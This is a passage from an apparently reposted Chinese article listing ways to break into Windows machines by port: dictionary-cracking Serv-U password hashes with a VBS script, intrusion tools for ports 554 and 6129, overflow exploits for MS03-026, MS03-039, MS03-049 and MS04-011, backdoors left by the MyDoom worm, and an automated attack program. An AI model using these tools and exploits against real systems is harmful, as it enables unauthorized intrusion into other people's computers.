输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵

利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

转载请注明出处windows之家 » win10怎么查远程侵入的IP